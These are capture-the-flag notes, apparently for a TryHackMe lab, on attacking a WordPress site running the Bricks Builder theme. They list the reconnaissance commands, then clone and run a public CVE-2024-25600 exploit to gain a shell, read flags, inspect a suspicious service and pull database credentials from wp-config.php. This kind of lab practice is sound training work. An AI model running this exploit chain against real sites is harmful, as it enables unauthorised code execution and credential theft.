** Note: Add 10.10.193.90 bricks.thm to your /etc/hosts file. **

>> nmap 10.10.193.90
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
443/tcp  open  https
3306/tcp open  mysql

>> gobuster dir -u 10.10.193.90 -w /usr/share/wordlists/dirbuster/directory-list-1.0.txt
No Result

Found:
robots.txt found: https://bricks.thm/robots.txt
 |  - /wp-admin/
 |  - /wp-admin/admin-ajax.php
https://bricks.thm/wp-login.php?redirect_to=https%3A%2F%2F10.10.193.90%2Fwp-admin%2F&reauth=1
https://10.10.193.90/wp-admin/admin-ajax.php
https://bricks.thm/comments/


>> wpscan --url https://10.10.193.90
Did not work

>> wpscan --url https://bricks.thm --disable-tls-checks
[+] WordPress theme in use: bricks
 | Readme: https://bricks.thm/wp-content/themes/bricks/readme.txt
 | Style URL: https://bricks.thm/wp-content/themes/bricks/style.css
 | Author URI: https://bricksbuilder.io/
 | Version: 1.9.5 (80% confidence)
 | Found By: Style (Passive Detection)

CVE-2024-25600 !!!
Google: bricks builder 1.9.5 exploit
>> git clone https://github.com/K3ysTr0K3R/CVE-2024-25600-EXPLOIT 
>> pip install beautifulsoup4 rich prompt_toolkit alive-progress
>> python CVE-2024-25600.py -u https://bricks.thm

Shell> cat 650c844110baced87e1606453b93f22a.txt
THM{fl46_650c844110baced87e1606453b93f22a}

https://www.howtogeek.com/839285/how-to-list-linux-services-with-systemctl/
>> systemctl list-units --type=service --state=running
::  ubuntu.service                                 loaded active running TRYHACK3M                                                       
>> systemctl cat ubuntu.service
# /etc/systemd/system/ubuntu.service
[...]
ExecStart=/lib/NetworkManager/nm-inet-dialog
[...]
Flag2: nm-inet-dialog


>> cat wp-config.php

/** Database username */
define( 'DB_USER', 'root' );

/** Database password */
define( 'DB_PASSWORD', 'lamp.sh' );

-> https://bricks.thm/phpmyadmin/















